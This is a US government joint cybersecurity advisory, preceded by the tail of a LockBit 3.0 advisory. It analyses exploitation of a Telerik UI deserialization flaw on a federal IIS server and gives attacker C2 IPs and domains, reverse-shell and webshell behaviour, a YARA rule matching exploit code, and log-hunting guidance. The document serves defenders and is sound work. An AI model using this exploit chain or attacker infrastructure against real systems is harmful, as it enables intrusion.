Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [CPG 5.1]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 1.5].
Disable unused ports.
Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:

Select an ATT&CK technique described in this advisory (see Table 3).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

REPORTING

The FBI is seeking any information that can be legally shared, including:

Boundary logs showing communication to and from foreign IP addresses
Sample ransom note
Communications with LockBit 3.0 actors
Bitcoin wallet information
Decryptor files
Benign sample of an encrypted file

The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.

Your feedback is important. Please take a few minutes to share your opinions on this product through an anonymous Product Feedback Survey.

Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server

CISA — Mon, 13 Mar 2023 13:57:57 EDT

SUMMARY

From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]

Actions to take today to mitigate malicious cyber activity:

Implement a patch management solution to ensure compliance with the latest security patches.
Validate output from patch management and vulnerability scanning against running services to check for discrepancies and account for all services.
Limit service accounts to the minimum permissions necessary to run services.

CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

Download the PDF version of this report:

Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server (PDF, 742.54 KB )

For a downloadable copy of IOCs, see

AA23-074A STIX XML (XML, 30.96 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.

Overview

CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.

In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.

Threat Actor Activity

CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].

When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:\Windows\Temp\ directory. The malicious files were then executed from the C:\Windows\Temp\ directory via the w3wp.exe process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.

CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll (e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll).

The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.

In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:\Windows\Temp\ directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.

Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.

Threat Actor 1

CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe process. In this instance, TA1 was able to upload malicious DLL files to the C:\Windows\Temp\ directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.

At least nine DLL files used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162 or 45.77.212[.]12. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:

Some of the analyzed samples can load additional libraries; enumerate the system, processes, files, directories [T1083]; and write files.
Other analyzed samples can delete DLL files ending with the .dll extension in the C:\Windows\Temp\ directory on the server. TA1 may use this capability to hide additional malicious activity on the network.

CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:

*Table 1: Observed TA1 IPs and Timestamps*
IP Address	First Identified	Last Identified
137.184.130[.]162	09/26/2022	10/08/2022
45.77.212[.]12	10/07/2022	11/25/2022
104.225.129[.]102	10/10/2022	11/16/2022
149.28.85[.]24	10/12/2022	10/17/2022
185.186.245[.]72	10/18/2022	10/18/2022
193.8.172[.]113	09/25/2022	09/25/2022
193.8.172[.]13	09/25/2022	10/17/2022
216.120.201[.]12	10/13/2022	11/10/2022
5.34.178[.]246	09/25/2022	09/25/2022
79.133.124[.]242	09/25/2022	09/25/2022
92.38.169[.]193	09/27/2022	10/08/2022
92.38.176[.]109	09/12/2022	09/25/2022
92.38.176[.]130	09/25/2022	10/07/2022

Threat Actor 2

TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word] nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]

As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:\Windows\Temp\ directory that TA2 executed via the w3wp.exe process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.

*Table 2: TA2 IPs and Resolving Domains*
IP Address	Resolving Domains
184.168.104[.]171	xework[.]com xegroups[.]com hivnd[.]com
144.96.103[.]245	xework[.]com

Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe and writing new files as xesvrs[.]exe to invoke reverse shell utilities execution.

*Table 3: Identified Malicious Files*
Filename	Description
XEReverseShell.exe	DLL files (masqueraded as PNG files) located in the `C:\Windows\Temp\` directory contain a base64 encoded file with the internal name `XEReverseShell.exe`, which was dropped into the same directory as `sortcombat.exe`. When executed, the reverse shell utility attempts to connect to `xework[.]com` or `xegroups[.]com` to obtain the IP address of the C2 server and port number for unencrypted communication. Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection.
Multi-OS_ReverseShell.exe	Reverse shell utility decoded from the base64 encoded file `xesmartshell.tmp`. When executed, it will attempt to connect to `xegroups[.]com` or `xework[.]com` to obtain the IP address of the C2 server and port number for unencrypted communication.
SortVistaCompat	Base64 encoded payload dropped from `Multi-OS_ReverseShell.exe`. This file receives the C2 IP and port from `xework[.]com`.

When the TA2 malware is executed a DLL file drops an executable (XEReverseShell.exe) that attempts to pull a C2 IP address and port number from xework[.]com or xegroups[.]com.

If no port or IP address is found, the program will exit.
If a port and IP address are found, the program will establish a listener and wait for further commands.

If communication is established between the TA2 malware and the C2:

The malware will identify the operating system (Windows or Linux) and create the appropriate shell (cmd or bash), sending system information back to the C2.
The C2 server may send the command xesetshell, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:\Windows\Temp\ directory.
The C2 server may send the command xequit, causing the malware to sleep for a period of time determined by the threat actors.

The two files xesmartshell.tmp and SortVistaCompat have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt decoded [T1140] as small.aspx [T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.

For more information on the DLLs, binaries, and webshell, see CISA MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 4 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.

*Table 4: Identified ATT&CK Techniques for Enterprise*
Reconnaissance
Technique Title	ID	Use
Active Scanning: Vulnerability Scanning	T1595.002	Actors were observed conducting active scanning activity for vulnerable devices and specific ports.
Initial Access
Technique Title	ID	Use
Exploit Public-Facing Application	T1190	Actors exploited a known vulnerability in the Microsoft IIS server.
Persistence
Technique Title	ID	Use
Server Software Component: Web Shell	T1505.003	TA2’s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands.
Defense Evasion
Technique Title	ID	Use
Masquerading: Match Legitimate Name or Location	T1036.005	Actors leveraged the legitimate `w3wp.exe` process on the IIS server to write malicious DLL files and evade detection.
Process Injection: DLL Injection	T1055.001	Actors loaded newly created DLLs into a running `w3wp.exe` process.
Indicator Removal: File Deletion	T1070.004	TA1’s malware deleted files with ".dll" from the `C:\Windows\Temp\` directory, which may indicate hidden malicious activity on the network.
Indicator Removal: Timestomp	T1070.006	Actors modified file time attributes to insert misleading creation dates.
Decode Files	T1140	The base64 encoded text file `small.txt` decoded as the webshell `small.aspx`.
Discovery
Technique Title	ID	Use
File and Directory Discovery	T1083	Actors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information. TA1’s malware enumerates systems, processes, files, and directories.
System Network Configuration Discovery	T1016	TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server.
Command and Control
Technique Title	ID	Use
Ingress Tool Transfer	T1105	TA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the `C:\Windows\Temp\` directory.
Non-Application Layer Protocol	T1095	Actors used a non-application layer protocol (TCP) for `w3wp.exe` process exploitation, C2, and enumeration on the IIS server.

DETECTION METHODS

CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.

Yara Rule

CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.

rule CISA_10424018_01 { meta: Author = "CISA Code & Media Analysis" Incident = "10424018" Date = "2023-02-07" Last_Modified = "20230216_1500" Actor = "n/a" Family = "n/a" Capabilities = "n/a" Malware_Type = "n/a" Tool_Type = "n/a" Description = "Detects open-source exploit samples" SHA256 = "n/a" strings: $s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C } $s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B } $s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 } $s3 = { 54 65 6C 65 72 69 6B 20 55 49 } $s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C } $s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 } $s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 } $s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 } $s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 } $s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 } $s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 } $s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B } $s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 } $s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 } condition: ($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13) }

Log Collection, Retention, and Analysis

CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.

Centralized log collection and monitoring allows for the discovery of webshell and other exploit activity. For example, organizations should monitor for external connections made from the IIS server to unknown external IP addresses. Logging may also be available—if enabled at the router or firewall—for any outbound connections initiated with PowerShell.
Access- and security-focused firewall (e.g., Web Application Firewall [WAF]) logs can be collected and stored for use in both detection and forensic analysis activities. Organizations should use a WAF to guard against publicly known web application vulnerabilities, in addition to guarding against common web application attacks.

Creation of Malicious DLLs

CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:\Windows\Temp\ directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.

Forensic analysis commonly identified the threat actors taking the following steps:

Create one of the DLL files (C:\Windows\Temp\1665890187.8690152.dll) by process w3wp.exe PID 6484.
Load the newly created DLL into a currently running IIS process, w3wp.exe PID 6484.
Make a TCP connection using w3wp.exe PID 6484 to 45.77.212[.]12 over port 443.
Invoke C:\Windows\System32\vcruntime140.dll (Windows C runtime library) to execute payload.

Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12 correlates to TA1, but the pattern can be used as general practice to identify similar activity.

Additional Searching for IIS Servers

The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.

File Type: DLL

Location: - %SystemDrive%\Windows\Temp\

When this CVE is exploited, it uploads malicious DLL files to the C:\Windows\Temp\ directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.

The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll

Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: \d{10}\.\d{1,8}\.dll

These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.

Log Type: IIS

Location: - %SystemDrive%\inetpub\logs\LogFiles

When investigating IIS logs, specific fields were searched for and captured during the time of each connection.

If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.

The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]

*Table 5: Four Fields Searched in IIS Logs*
General Name	Field Name	Description
Method	cs-method	Requested action; for example, a GET method
URI Stem	cs-uri-stem	Universal Resource Identifier (URI), or target, of the action
URI Query	cs-uri-query	The query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages.
Protocol Status	sc-status	Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code

Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.

When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).

Example: cs_method instead of cs-method

Artifacts:

*Table 6: Information Contained in Two Observed IIS Events*
Field Name	Artifact
cs-method	POST
>cs-uri-stem	/Telerik.Web.UI.WebResource.axd
cs-uri-query	type=rau
sc-status	200 and 302

When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.

Log Type: Windows Event Application Logs

Location: -%SystemDrive%\Windows\System32\winevt\logs\Application.evtx

Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.

*Table 7: Example Payload Data*
EventID	Payload
1309	3005, An unhandled exception has occurred[redacted]w3wp.exe[redacted]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.\n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n\n, [redacted]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [redacted], False, [redacted], 15, [redacted], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)\n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()\n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)\n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)\n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\n","Binary":""}}

Authoring organizations recommend looking for the following key strings in the payload:

w3wp.exe: This is the parent process that executes the code inside the malicious DLLs.
System.Configuration.Install.AssemblyInstaller: Figure 1 is from the creator’s GitHub repo,[7] where the string can be observed in the code. As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]

Figure 1: Threat Actor Assembly Installer

If a Werfault crash report was written, Windows event application logs may contain evidence of this— even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors.

*Table 8: Example Threat Actor Cleanup*
EventID	ExecutableInfo	MapDescription	Payload
1000	w3wp.exe \|1664175639.65719.dll \|c:\windows\system32\inetsrv\w3wp.exe \|C:\Windows\Temp\1664175639.65719.dll	Application Error	{"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\\windows\\system32\\inetsrv\\w3wp.exe, C:\\Windows\\Temp\\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}}
1001	w3wp.exe \|1664175639.65719.dll \|C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe \|C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe \|C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_w3wp.exe	Application Crash	{"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, \nC:\\Windows\\Temp\\WERE3F6.tmp.appcompat.txt\nC:\\Windows\\Temp\\WERE639.tmp.WERInternalMetadata.xml\nC:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\memory.hdmp\nC:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\triagedump.dmp, C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}}

The EventID field maps to Windows EventIDs for an easy filter. Users can leverage the Windows EventIDs to find malicious DLL with the Unix Epoch time-based name inside the C:\Windows\Temp\ directory.

Depending how log analysis is performed, various filters can be determined. However, if regex is available, the example listed in Table 8 above can be reused to match the Unix Epoch timestamp convention to assist in filtering.

Additional Analysis

When evidence of malicious DLLs is found, reverse engineering will need to be conducted to fully understand what actions occur as the malicious files could do nearly anything. Leveraging Windows security event logs, as well as Windows PowerShell logs, may provide insight into what actions the DLLs are taking. CISA and authoring organizations recommend the following process:

Convert any discovered malicious DLL timestamps to readable format.
Export the Windows security event and PowerShell logs from the device.
- Default path: %SystemDrive%\Windows\System32\winevt\logs\Windows PowerShell
- Default path: %SystemDrive%\Windows\System32\winevt\logs\Security.evtx
Filter based on identified timestamps.
Search for new processes created via w3wp.exe in Windows security event logs (e.g., Windows EventID 4688 New Process created).
Search for new PIDs from identified events. Investigate to determine if they spawned any other processes.
- Example: CMD.EXE launching PowerShell or running other commands such as nslookup or netstat. Note: This is not an exhaustive list.
Search for EventID 600 in PowerShell logs.

Trellix XDR Platform Searching

If Trellix XDR Platform is deployed in an environment and a standard HX triage audit is completed in a timely manner of the suspected use of CVE-2019-18935, an organization can search for file write events from known web processes. This will identify the executables written by the web server process. CISA and authoring organizations specifically recommend searching for the following field value pair:

*Table 9: Field Value Pair for Searching*
Field	Value Begins With
TextAtLowestOffset	MZ

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Manage Vulnerabilities and Configurations

Upgrade all instances of Telerik UI ASP.NET AJAX to the latest version after appropriate testing. Keep all software up to date and prioritize patching to known exploited vulnerabilities (KEVs). [CPG 5.1]
Prioritize remediation of vulnerabilities on internet-facing systems. For additional guidance, see CISA Insights - Remediate Vulnerabilities for Internet-Accessible Systems. [CPG 5.1]
Implement a patch management solution to ensure compliance with the latest security patches. A patch management solution that inventories all software running in addition to vulnerability scanning is recommended.
Ensure vulnerability scanners are configured to scan a comprehensive scope of devices and locations. For example, as noted in the Technical Details section, the victim organization had the appropriate plugin for CVE-2019-18935, but the vulnerability went undetected due to the Telerik UI software being installed in a file path not typically scanned. To identify unpatched instances of software vulnerabilities, organizations using vulnerability scanners should be aware that all installations may not be considered “typical” and may require full file scans of web applications.
- Note: Vulnerability scanners may have limitations in detecting vulnerabilities, such as only being able to identify Windows Installer-installed applications, which was the case with this agency’s vulnerability scanner. The Telerik UI software was installed via a continuous integration (CI) and continuous delivery (CD) pipeline rather than the Windows Installer. This highlights the importance of using a comprehensive approach for vulnerability scanning that considers all potential installation methods and file paths.
Validate output from patch management and vulnerability scanning solutions against running services to check for discrepancies and account for all services.

Segment Networks Based on Function

Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. (See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s Segment Networks and Deploy Application-Aware Defenses.) [CPG 8.1]
Isolate similar systems and implement micro-segmentation with granular access and policy restrictions to modernize cybersecurity and adopt zero trust principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration. Utilize access control lists (ACLs), hardened firewalls, and network monitoring devices to regulate, monitor, and audit cross-segment access and data transfers.

Other Best Practice Mitigation Recommendations

Implement phishing-resistant multifactor authentication (MFA) for as many services possible—particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.
- MFA can still be leveraged for secure access using a jump server—an asset placed between the external and internal networks that serves as an intermediary for access—to facilitate connections if assets do not have the capability to support MFA implementation.
- For additional guidance on secure MFA configurations, visit cisa.gov/mfa. [CPG 1.3]
Monitor and analyze activity logs generated from Microsoft IIS and remote PowerShell. Collect access and security focused logs (IDS/IDPS, firewall, DLP, VPN) and ensure logs are securely stored for a specified duration informed by risk or pertinent regulatory guidance. [CPG 3.1, 3.2]
- Evaluate user permissions and maintain separate user accounts for all actions and activities not associated with the administrator role, e.g., for business email, web browsing, etc. All privileges should be reevaluated on a recurring basis to validate continued need for a given set of permissions. [CPG 1.5]
Limit service accounts to the minimum permissions necessary to run services. CISA observed numerous error messages in network logs indicative of failed attempts to write files to additional directories or move laterally.
